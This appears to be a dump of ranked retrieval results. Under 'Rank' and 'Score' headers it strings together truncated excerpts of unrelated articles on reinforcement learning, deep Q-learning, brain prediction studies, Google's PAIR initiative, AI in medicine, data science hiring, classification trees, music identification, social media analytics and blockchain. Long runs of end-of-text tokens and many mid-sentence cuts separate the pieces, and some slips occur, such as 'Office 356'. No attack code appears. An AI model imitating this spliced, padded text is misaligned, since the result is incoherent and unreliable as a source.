ext|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 16; Score = 6946816.0 +<|begin_of_text|>It’s been a while we haven’t covered any machine learning algorithm. Last time we discussed the Markov Decision Process (or MDP). + +Today we’re going to build our knowledge on top of the MDP and see how we can generalise our MDP to solve more complex problems. + +Reinforcement learning really hit the news back in 2013 when a computer learned how to play a bunch of old Atari games (like Breakout) just by observing the pixels on the screen. Let’s find out how this is possible! + +In Breakout the goal is to destroy all the bricks at the top of the screen by bouncing a ball over a paddle that you can move horizontally at the bottom of the screen. Every time the ball hits a brick your score increases. + +The idea + +If we want to teach a computer how to play that game, one solution might be to use a classifier such as a neural network where the input would be the screen images and the output the action to perform. It makes sense as for each screen we want to know if the paddle should move left or right (or stay still). The problem is that we need lots of training examples. But this is not how we learn! We don’t want someone to tell us a million time what we should do! + +Instead we learn by observing the reward we get as a consequence of our actions. This is the essence of reinforcement learning. An agent (the player) performs some actions which change the state of the environment (the pixels on the screen) and gets a reward for his actions (increase of score). + +Reinforcement learning lies somewhere between supervised and unsupervised learning. In supervised learning we have a label for every training example and in unsupervised learning there is no label at all. In reinforcement learning we have rewards which are sparse and time-delayed labels. Using only on those rewards the agent has to learn to behave in the environment. + +It may seem simple but there are some challenges along the way. When the ball hits a brick it has nothing to do with the action you just take. In fact it was the action performed when the ball bounced on the paddle that sent the ball against the brick. The problem of identifying which action is at the origin of the reward is known as the credit assignment problem. + +Markov Decision Process + +Doesn’t it sound familiar? Indeed, it looks quite similar to our tiny robot example we use to illustrate the MDP. + +The robot (the agent) moves (take actions) and gets a reward as it moves closer to +================================================================================ +Rank = 17; Score = 6782976.0 +<|begin_of_text|>We CAN predict the future (a bit): Why the brain knows what's going to happen before it does + +People subconsciously make thousands of tiny predictions each day, whether it's contemplating when a bus will arrive, who is knocking on the door or if a dropped glass will break. + +Now scientists are beginning to unravel how the brain is such a surprisingly accurate fortune-teller - but only when it comes to mundane events. + +Researchers at Washington University in St Louis focused on the mid-brain dopamine system (MDS), which provides signals to the rest of the brain when unexpected events occur. + +Each of us makes thousands of tiny predictions, such as contemplating when a bus will arrive, every day. Scientists are now beginning to unravel how the brain is such a surprisingly accurate fortune-teller + +Using functional MRI (fMRI), they found that this system encodes prediction error when viewers are forced to choose what will happen next in a video of an everyday event. + +They found that between 80 and 90 per cent of viewer predictions were correct, depending on when the footage was stopped. + +Lead researcher Jeffrey Zacks said predicting the near future is vital in guiding behaviour and is a key component of theories of perception, language processing and learning. + +He said: 'It's valuable to be able to run away when the lion lunges at you, but it's super-valuable to be able to hop out of the way before the lion jumps. + +'It's a big adaptive advantage to look just a little bit over the horizon.' + +The research will also help those in the early stages of neurological diseases such as schizophrenia, Alzheimer's and Parkinson's, Professor Zacks said. + +The scientists tested healthy young volunteers who were shown films of everyday events such as washing a car, building a Lego model or washing clothes. The film would be watched for a while, and then it was stopped. + +Participants were then asked to predict what would happen five seconds later when the film was re-started by selecting a picture that showed what would happen. + +Half of the time, the movie was stopped just before an event boundary, when a new event was just about to start. The other half of the time, the film was stopped in the middle of an event. + +The researchers found that participants were more than 90 per cent correct in predicting activity within the event, but less than 80 per cent correct in predicting across the event boundary. They were also less confident in their predictions. + +'Successful predictions are associated with the subjective experience of a smooth stream of consciousness' + +Professor Zacks said: +================================================================================ +Rank = 18; Score = 6684672.0 +<|begin_of_text|>Feb 6, 2017 + +This blog post will demonstrate how deep reinforcement learning (deep Q-learning) can be implemented and applied to play a CartPole game using Keras and Gym, in less than 100 lines of code! + +I’ll explain everything without requiring any prerequisite knowledge about reinforcement learning. + +The code used for this article is on GitHub. + +Reinforcement Learning + +Reinforcement Learning is a type of machine learning that allows you to create AI agents that learn from the environment by interacting with it. Just like how we learn to ride a bicycle, this kind of AI learns by trial and error. As seen in the picture, the brain represents the AI agent, which acts on the environment. After each action, the agent receives the feedback. The feedback consists of the reward and next state of the environment. The reward is usually defined by a human. If we use the analogy of the bicycle, we can define reward as the distance from the original starting point. + +Deep Reinforcement Learning + +Google’s DeepMind published its famous paper Playing Atari with Deep Reinforcement Learning, in which they introduced a new algorithm called Deep Q Network (DQN for short) in 2013. It demonstrated how an AI agent can learn to play games by just observing the screen without any prior information about those games. The result turned out to be pretty impressive. This paper opened the era of what is called ‘deep reinforcement learning’, a mix of deep learning and reinforcement learning. + +Click to Watch: DeepMind’s Atari Player + +In Q-Learning Algorithm, there is a function called Q Function, which is used to approximate the reward based on a state. We call it Q(s,a), where Q is a function which calculates the expected future value from state s and action a. Similarly in Deep Q Network algorithm, we use a neural network to approximate the reward based on the state. We will discuss how this works in detail. + +Cartpole Game + +Usually, training an agent to play an Atari game takes a while (from few hours to a day). So we will make an agent to play a simpler game called CartPole, but using the same idea used in the paper. + +CartPole is one of the simplest environments in OpenAI gym (a game simulator). As you can see in the animation from the top, the goal of CartPole is to balance a pole connected with one joint on top of a moving cart. Instead of pixel information, there are 4 kinds of information given by the state, such as angle of the +================================================================================ +Rank = 19; Score = 6520832.0 +<|begin_of_text|>The past few years have seen rapid advances in machine learning, with dramatic improvements in technical performance—from more accurate speech recognition, to better image search, to improved translations. But we believe AI can go much further—and be more useful to all of us—if we build systems with people in mind at the start of the process. + +Today we’re announcing the People + AI Research initiative (PAIR) which brings together researchers across Google to study and redesign the ways people interact with AI systems. The goal of PAIR is to focus on the "human side" of AI: the relationship between users and technology, the new applications it enables, and how to make it broadly inclusive. The goal isn’t just to publish research; we’re also releasing open source tools for researchers and other experts to use. + +PAIR's research is divided into three areas, based on different user needs: + +Engineers and researchers: AI is built by people. How might we make it easier for engineers to build and understand machine learning systems? What educational materials and practical tools do they need? + +Domain experts: How can AI aid and augment professionals in their work? How might we support doctors, technicians, designers, farmers, and musicians as they increasingly use AI? + +Everyday users: How might we ensure machine learning is inclusive, so everyone can benefit from breakthroughs in AI? Can design thinking open up entirely new AI applications? Can we democratize the technology behind AI? + +We don't have all the answers—that's what makes this interesting research—but we have some ideas about where to look. One key to the puzzle is design thinking. Instead of viewing AI purely as a technology, what if we imagine it as a material to design with? Here history might serve as a guide: For instance, advances in computer graphics meant more than better ways of drawing pictures—and that led to completely new kinds of interfaces and applications. You can read more in this post on what we call human-centered machine learning (HCML).We’re open sourcing new tools, creating educational materials (such as guidelines for designing AI interfaces), and publishing research to answer these questions and spread the power of AI to as many people as possible. + +Open-source tools + +Today we're open sourcing two visualization tools, Facets Overview and Facets Dive. These applications are aimed at AI engineers, and address the very beginning of the machine learning process. The Facets applications give engineers a clear view of the data they use to train AI systems. + +We think this is important because training data is a key ingredient in modern AI systems, but it can +================================================================================ +Rank = 20; Score = 6488064.0 +<|begin_of_text|>$\begingroup$ + +maybe all the major/preferred algorithms of interest to this audience have been mentioned at this point. however, a few more deserve mention for completeness. & some analysis of what is considered a significant algorithm is relevant here. + +in CS & IT fields there seems to be a phenomenon noticed long ago in AI called "moving the goalposts". this is a psychological phenomenon where the field advances relatively quickly but people quickly mentally adjust to "the new normal" and take real or even breakthrough advances as mundane or unremarkable in retrospect, after accomplished, ie downplayed or minimized. this is highly captured in this question in the way that algorithms move from R&D into "deployment". quoting the author of the question in later comments: + +In fact, a negligible fraction of all the code that gets written is implementing anything that is interesting from an algorithmic point of view. + +but this is problematic and basically a TCS-centric redefinition of the word "algorithm". presumably the interesting algorithms are advanced. does that mean that if a problem is reduced to an advanced algorithm, its no longer "interesting"? and "advanced" is clearly a moving target. so there is a way to define "algorithms" narrowly, or broadly. it seems the TCS definition changes on context, but note even in TCS, there is a trend toward the broad definition eg in the so-called "algorithmic lens". + +sometimes the most ubiquitous algorithms are also the most overlooked! the internet and WWW is a large environment/near-ecology for algorithms. still relatively young at only about 2 decades old (invented ~1991) it has grown massively and exponentially in a short amount of time. WWW site growth has probably even outpaced the famous exponential Moores law. + +the internet/WWW are supported by many sophisticated algorithms. the internet has complex routing algorithms built into routers (again powering multi-billion-dollar corporations such as Cisco). some advanced theory is applicable there eg in routing algorithms. these algorithms were a subject of emerging, advanced/cutting edge research decades ago however a now so finetuned & well understood that its somewhat invisible. + +we should not so soon forget that decades ago, leading researchers were not even sure if the internet world work or was possible (seen in early packet switching research, a radical new design pattern at the time departing from the prior circuit-switching), and even a few years ago there were fears that it would fail to scale at some point and begin to fail due to overwhelming spikes in volume. + +it also uses sophisticated error detection/correction. +================================================================================ +Rank = 21; Score = 6455296.0 +<|begin_of_text|>Artificial intelligence (AI) may conjure up images of intelligent systems rising up to enslave us, with sadistic driverless cars taking passengers on terrifying joyrides and malevolent smart fridges refusing to order milk. + +But in reality, AI is already here; many of us just do not realise it yet. Through the development of machine learning, the technology industry has created smart systems designed to help, not hinder, people. + +Rather than send murderous robots back in time to destroy us, machine learning sits behind the scenes in the form of algorithms that learn from data to better deliver services offered by software applications. + +This is the direction that Forrester principal analyst Diego Lo Giudice believes AI is heading: "While some AI research still tries to simulate our brain or certain regions of it - and is frankly unlikely to deliver concrete results anytime soon - most of it now leverages a less human, but more effective, approach revolving around machine learning and smart integration with other AI capabilities," he said in a blog post. + +One example of this is Office Graph, created by Microsoft. Office Graph sits behind Office 356 and maps the relationships between people, content and activity across the company's productivity software suite. + +Office Graph uses these relationships to serve up documents, files, email messages, and other elements in Office 365 that are relevant to the work the user is carrying out, with the goal of making the user more productive. + +Another example is Microsoft's Skype Translator, which uses machine learning capabilities to improve the accuracy of its translation of spoken languages, something CEO Satya Nadella likens to "magic". + +"The one fascinating feature of this is something called transfer learning. What happens is you teach it English and it learns English. Then you teach it Mandarin, and it learns Mandarin, but it becomes better at English," he said. + +"Then you teach it Spanish, and it gets good at Spanish but gets great at both Mandarin and English. Quite frankly none of us knows exactly why. It's magic." + +Not wanting to be left behind, Google recently announced an update to Google Translate to provide real-time translations that use machine learning to deliver better results the more it is used. + +Big data analytics + +But, while machine learning might improve the performance of consumer-level services, it is in the enterprise world that it really shines. + +Big data is a big business, but trawling through hundreds of gigabytes of often unstructured information can be a lengthy and resource-sapping process. Add machine learning into the mix and that process becomes a lot easier. + +Rather than +================================================================================ +Rank = 22; Score = 5931008.0 +<|begin_of_text|>Three Challenges for Artificial Intelligence in Medicine + +Brandon Ballinger Blocked Unblock Follow Following Sep 19, 2016 + +Why is the world’s most advanced AI used for cat videos, but not to help us live longer and healthier lives? A brief history of AI in Medicine, and the factors that may help it succeed where it has failed before. + +Imagine yourself as a young graduate student in Stanford’s Artificial Intelligence lab, building a system to diagnose a common infectious disease. After years of sweat and toil, the day comes for the test: a head-to-head comparison with five of the top human experts in infectious disease. Over the first expert, your system squeezes a narrow victory, winning by just 4%. It beats the second, third, and fourth doctors handily. Against the fifth, it wins by an astounding 52%. + +Would you believe such a system exists already? Would you believe it existed in 1979? This was the MYCIN project, and in spite of the excellent research results, it never made its way into clinical practice. [1] + +In fact, although we’re surrounded by fantastic applications of modern AI, particularly deep learning — self-driving cars, Siri, AlphaGo, Google Translate, computer vision — the effect on medicine has been nearly nonexistent. In the top cardiology journal, Circulation, the term “deep learning” appears only twice [2]. Deep learning has never been mentioned in the New England Journal of Medicine, The Lancet, BMJ, or even JAMA, where the work on MYCIN was published 37 years ago. What happened? + +There are three central challenges that have plagued past efforts to use artificial intelligence in medicine: the label problem, the deployment problem, and fear around regulation. Before we get in to those, let’s take a quick look at the state of medicine today. + +The Moral Case for AI in Healthcare + +Medicine is life and death. With such high stakes, one could ask: should we really be rocking the boat here? Why not just stick with existing, proven, clinical-grade algorithms? + +Well, consider a few examples of the status quo: + +The most common prediction model for stroke risk was based on only 25 strokes. Source: Lip 2010 + +To be clear, none of this means medical researchers are doing a bad job. Modern medicine is a miracle; it’s just unevenly-distributed. Computer scientists can bring much to the table here. With tools like Apple’s ResearchKit and Google Fit, we can collect health data at scale +================================================================================ +Rank = 23; Score = 5832704.0 +<|begin_of_text|>This post is by Instacart VP Data Science Jeremy Stanley, and technical advisor and former LinkedIn data leader Daniel Tunkelang. Previously, Jeremy wrote the most comprehensive manual we’ve ever seen for hiring data scientists. + +It's hard to believe that "data scientist" only became a bona fide job title in 2008. Jeff Hammerbacher at Facebook and DJ Patil at LinkedIn coined the term to capture the emerging need for interdisciplinary skills across analytics, engineering, and product. Today, the demand for data scientists has blossomed, and with it the need to better understand how to grow these teams for success. + +The two of us have seen our share of the good, the bad, and the ugly, leading and advising teams at a variety of companies in different industries and at different stages of maturity. We've seen the challenges of not only hiring top data scientists, but making effective use of them and retaining them in a hyper competitive market for talent. + +In this article, we've summarized the advice we give to founders who are interested in building data science teams. We explain why data science is so important for many startups, when companies should begin investing in it, where to put data science in their organization and how to build a culture where data science thrives. + +First, what are you trying to achieve? + +Data science serves two important but distinct sets of goals: improving the products your customers use, and improving the decisions your business makes. + +Data products use data science and engineering to improve product performance, typically in the form of better search results, recommendations and automated decisions. + +Decision science uses data to analyze business metrics — such as growth, engagement, profitability drivers, and user feedback — to inform strategy and key business decisions. + +This distinction may sound straightforward, but it’s an important one to keep in mind as you establish and grow your data science team. Let’s take a closer look at these two areas. + +Using Data Science to Build Better Products + +Data products leverage data science to improve product performance. They rely on a virtuous cycle where products collect usage data that becomes the fodder for algorithms which in turn offer users a better experience. + +What happens before you’ve collected that data? The first version of your product has to address what data science calls the “cold start” problem — it has to provide a "good enough" experience to initiate the virtuous cycle of data collection and data-driven improvement. It’s up to product managers and engineers to implement that good enough solution. + +For example, when an Instacart user visits the site, the application +================================================================================ +Rank = 24; Score = 5832704.0 +<|begin_of_text|>Introduction + +I’ve always thought it would be neat to create a digital version of oneself. The closest that programmers can get, is most likely the chat bot. Aside from chat bots being a goal towards beating the Turing Test, there may be an ulterior motive involved as well - to create a digital copy of one’s own personality, and thus, a pseudo form of immortality. We’ve come a long way in this progress (the chat bot part, not the immortality part), starting from the humble orgins of Eliza all the way to the highly configurable Alice chat bot. + +Chat bots typically use case-based reasoning or similar techniques to map responses to certain keywords in a sentence. In this manner, a crude personality can be programmed, and a unique chat bot created. This is definitely an interesting exercise that I think all software developers should try, at least once. But, let’s try something a little different and apply a modern spin to the idea of an artificially generated digital persona. + +Is it possible to apply machine learning to a Twitter user’s collection of tweets and accurately develop a model of the personality? + +This article describes a program, using unsupervised learning with the K-Means algorithm, to automatically group a collection of tweets into distinct categories. Once the categories have been organized, the program will then locate new links that match the categories and recommend them for the persona. In the process, we’ll create a machine learning recommendation engine for Twitter that will recommend links, related to the user’s interests, and automatically identify new content. + +Supervised vs Unsupervised Learning + +There are two core methods for building a model from data with machine learning: supervised and unsupervised learning. Since we’re trying to determine a set of topics for a Twitter user’s personality, we could choose either method to build a recommendation engine. Let’s take a look at what’s involved for each learning type. + +Supervised Learning + +Using supervised learning, such as an SVM, a model could be constructed that maps articles a user likes vs dislikes. This is similar to book or movie rating services. We would record a set number of links that the user clicks on and an equal set of links that the user skips over (assume that we’re using an RSS feed of articles in this example). The SVM would learn to classify new articles as being liked or disliked, thus determining a general personality. One drawback to this approach is the sheer amount of rated data that is required, in addition to a logging mechanism to record the likes/dislikes. Since this kind of +================================================================================ +Rank = 25; Score = 5799936.0 +<|begin_of_text|>How to Grow and Prune a Classification Tree + +In what follows, we will describe the work of Breiman and his colleagues as set out in their seminal book "Classification and Regression Trees." Theirs is a very rich story, and we will concentrate on only the essential ideas... + +David Austin + +Grand Valley State University + +Email David Austin + +Introduction + +It's easy to collect data these days; making sense of it is more work. This article explains a construction in machine learning and data mining called a classification tree. Let's consider an example. + +In the late 1970's, researchers at the University of California, San Diego Medical Center performed a study in which they monitored 215 patients following a heart attack. For each patient, 19 variables, such as age and blood pressure, were recorded. Patients were then grouped into two classes, depending on whether or not they survived more than 30 days following the heart attack. + +Assuming the patients studied were representative of the more general population of heart attack patients, the researchers aimed to distill all this data into a simple test to identify new patients at risk of dying within 30 days of a heart attack. + +By applying the algorithm described here, Breiman, Freidman, Olshen, and Stone, created a test consisting of only three questions---what is the patient's minimum systolic blood pressure within 24 hours of being admitted to the hospital, what is the patient's age, does the patient exhibit sinus tachycardia---to identify patients at risk. In spite of its simplicity, this test proved to be more accurate than any other known test. In addition, the importance of these three questions indicate that, among all 19 variables, these three factors play an important role in determining a patient's chance of surviving. + +Besides medicine, these ideas are applicable to a wide range of problems, such as identifying which loan applicants are likely to default and which voters are likely to vote for a particular political party. + +In what follows, we will describe the work of Breiman and his colleagues as set out in their seminal book Classification and Regression Trees. Theirs is a very rich story, and we will concentrate on only the essential ideas. + +Classification trees + +Before we start developing a general theory, let's consider an example using a much studied data set consisting of the physical dimensions and species of 150 irises. Here are the data for three irises out of the 150 in the full data set: + +Sepal Length Sepal Width Petal Length Petal Width Species +================================================================================ +Rank = 26; Score = 5734400.0 +<|begin_of_text|>Computer Vision for Music Identification + +by Yan Ke, Derek Hoiem, and Rahul Sukthankar + +Abstract: + +We describe how certain tasks in the audio domain can be effectively addressed using computer vision approaches. This paper focuses on the problem of music identification, where the goal is to reliably identify a song given a few seconds of noisy audio. Our approach treats the spectrogram of each music clip as a 2-D image and transforms music identification into a corrupted sub-image retrieval problem. By employing pairwise boosting on a large set of Viola-Jones features, our system learns compact, discriminative, local descriptors that are amenable to efficient indexing. During the query phase, we retrieve the set of song snippets that locally match the noisy sample and employ geometric verification in conjunction with an EM-based "occlusion" model to identify the song that is most consistent with the observed signal. We have implemented our algorithm in a practical system that can quickly and accurately recognize music from short audio samples in the presence of distortions such as poor recording quality and significant ambient noise. Our experiments demonstrate that this approach significantly outperforms the current state-of-the-art in content-based music identification. + +Y. Ke, D. Hoiem, and R. Sukthankar. In Proceedings of Computer Vision and Pattern Recognition, 2005. [PDF 240KB] + +Demo and Code available here: + +Demonstration video: [CVPR05Video.avi 16MB]. Encoded with Indeo 5.10 and IMA ADPCM. There are both Windows and Linux codecs. + +Windows/Cygwin and Linux binary demo code and sample music: [mrdemo.tgz 15.7MB] + +C++ server code: [musicretr-1.0.tar.gz 87KB] + +Java graphical user interface: [mrgui.tgz 21KB]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 27; Score = 5537792.0 +<|begin_of_text|>Energy lab team explores new ways of analyzing social media + +A team at the Energy Department’s Pacific Northwest National Laboratory is creating an analysis tool that makes spotting trends in social media faster and easier. + +The tool, called SALSA, for SociAL Sensor Analytics, takes an automated approach that can sort through billions of tweets or other posts in seconds, identifying patterns and finding key bits of information that could be useful in emergency response, public health and other areas, according to PNNL. + +SALSA draws on the computing power of PNNL’s 600-node, 162-Teraflop Olympus supercomputing cluster, so the processing power is there. The challenge was finding a way to dig useful information out from all the banter on a platform that also has a non-traditional lexicon. + +“The task we all face is separating out the trivia, the useless information we all are blasted with every day, from the really good stuff that helps us live better lives,” Court Corley, a PNNL data scientist who’s leading the research, said in PNNL’s report. “There's a lot of noise, but there's some very valuable information too." + +Corley said the reach of social media creates value in analyzing posts to various platforms. "The world is equipped with human sensors — more than 7 billion and counting,” he said. “It's by far the most extensive sensor network on the planet. What can we learn by paying attention?" + +Agencies have employed systems to monitor social media, such as the U.S. Geological Survey’s Twitter Earthquake Detector (TED). The system was created in 2009 because Twitter often spreads the word about earthquakes and other disasters faster than traditional sensor methods. But one reason TED works is that USGS taps into Twitter’s API to search for a known keyword — “earthquake.” Taking a deeper dive into analyzing social media is more of a challenge. + +The Library of Congress has run into that difficulty with its Twitter archive. LOC has collected hundreds of billions of tweets for use in research, but found that available tools for sifting through the archive are inadequate. Searches take too much time (just searching the 20 billion tweets in its initial collection would take 24 hours), and as a result LOC was turning down requests from researchers to explore the archive. + +And the amount of social media-generated data is only going to grow. PNNL points out that, as of mid-2012, information posted to social media outlets each hour included an average of 30 million comments, +================================================================================ +Rank = 28; Score = 5505024.0 +<|begin_of_text|>💪 From the big boys + +Backchannel run a rare piece on how Apple uses machine learning. It states that a 200mb software package runs on the iPhone encompassing “app usage data, interactions with contacts, neural net processing, a speech modeler and a natural language event modeling system”. I’ve held the view for a while now that today’s AI techniques and infrastructure will re-open a class of historically intractable problems while also enabling us to rethink how products and features should be designed. Apple seem to think the same: “Machine learning is enabling us to say yes to some things that in past years we would have said no to. It’s becoming embedded in the process of deciding the products we’re going to do next.” + +, modestly called + +Salesforce announced their internal umbrella AI initiative, modestly called Einstein, which will go on to power many of the company’s cloud services, as well as expose AI tools to end users. The team of 175 data scientists includes talent from acquired startups MetaMind, PredictionIO and RelateIQ. The company’s flagship event, Dreamforce, will attract 170k people into SF next week. + +Six of the most powerful technology companies have set up the have set up the Partnership on AI as a non-profit aimed at advancing public understanding of AI and formulate best practices on the challenges and opportunities within the field. An important catalyst to this end will undoubtedly be the continuation of open source technology development, which Seldon’s founder articulates in this piece. + +🌎 On the importance and impact of AI on the World + +Stanford’s 100 year study on AI published their first report. It finds “no cause for concern that AI is an imminent threat to humankind. No machines with self-sustaining long-term goals and intent have been developed, nor are they likely to be developed in the near future”. From a public policy perspective, it recommends to: + +Define a path toward accruing technical expertise in AI at all levels of government. + +Remove the perceived and actual impediments to research on the fairness, security, privacy, and social impacts of AI systems. + +Increase public and private funding for interdisciplinary studies of the societal impacts of AI. + +a16z’s Chris Dixon sets out 11 reasons to be excited about the future of technology with short soundbites for each. Five of these are either directly related to or will be enabled by AI and machine learning. + +👍 User-friendly AI + +UC Berkeley announced a new Center for Human-Compatible AI to study how AI used for mission +================================================================================ +Rank = 29; Score = 5472256.0 +<|begin_of_text|>DeepMind + +When DeepMind burst into prominent view in 2014 it taught its machine learning systems how to play Atari games. The system could learn to defeat the games, and score higher than humans, but not remember how it had done so. + +DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose DeepMind DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose + +Advertisement + +For each of the Atari games, a separate neural network had to be created. The same system could not be used to play Space Invaders and Breakout without the information for both being given to the artificial intelligence at the same time. Now, a team of DeepMind and Imperial College London researchers have created an algorithm that allows its neural networks to learn, retain the information, and use it again. + +"Previously, we had a system that could learn to play any game, but it could only learn to play one game," James Kirkpatrick, a research scientist at DeepMind and the lead author of its new research paper, tells WIRED. "Here we are demonstrating a system that can learn to play several games one after the other". + +Read next DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass + +The work, published in the Proceedings of the National Academy of Sciences journal, explains how DeepMind's AI can learn in sequences using supervised learning and reinforcement learning tests. This is also explained in a blog post from the company. + +Watch Google's Deep Mind complete Montezuma's Revenge Gaming Watch Google's Deep Mind complete Montezuma's Revenge + +Advertisement + +"The ability to learn tasks in succession without forgetting is a core component of biological and artificial intelligence," the computer scientists write in the paper. Kirkpatrick says a "significant shortcoming" in neural networks and artificial intelligence has been its inability to transfer what it has learned from one task to the next. + +The group says it has been able to show "continual learning" that's based on'synaptic consolidation'. In the human brain, the process is described as "the basis of learning and memory". + +The performance of DeepMind's EWC algorithm 'enhanced' neural network compared to its other nets DeepMind / PNAS + +Read next DeepMind's latest AI breakthrough is its most significant yet DeepMind's latest AI breakthrough is its most significant yet +================================================================================ +Rank = 30; Score = 5406720.0 +<|begin_of_text|>The Bitcoin technologies, namely blockchains are sidechains are used for various other purposes than just for registering and facilitating transactions over the Bitcoin network. Some of the new companies like Astroblocks and Bitproof are building Proof-of-Existence platforms (there is also another platform by the same name) over the Bitcoin blockchain. + +These Proof-of-Existence platforms provides a smart tamper-proof way of storing encrypted information on the Bitcoin blockchain. Each file stored on the blockchain will be associated with a unique irreplicable transaction hash. These transaction hashes will act as a reference to the documents stored on the blockchain. Anything once written on to the blockchain will be stored forever, without any way of deleting it and that is what makes it an ideal electronic system to certify and store documents. + +We can safely say that intellectual property is the most valuable asset any individual or company can have. The process of obtaining protection for your intellectual property is still a cumbersome process. It involves filing the necessary applications, multiple times in few cases and waiting for a long time for the authorities to verify and grant protection. Blockchain based Proof-of-Existence platforms provides an alternate way for both individuals and companies alike to document their creations or discoveries and handle IP disputes more efficiently. + +Whether it is a new scientific invention, design, artwork, screenplay, story or anything. The creator can record his works on these Proof-of-Existence platforms. In case of any dispute, the inventor can always contest any claims by using the transactional hash of the concerned document. The hash will also act as a timestamp that can be used to identify the time when it was uploaded onto the blockchain. + +Now that anyone can make use of these Proof-of-Existence services, making it easier for them to claim and receive credit for their innovation and creation, no matter how small it is.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_o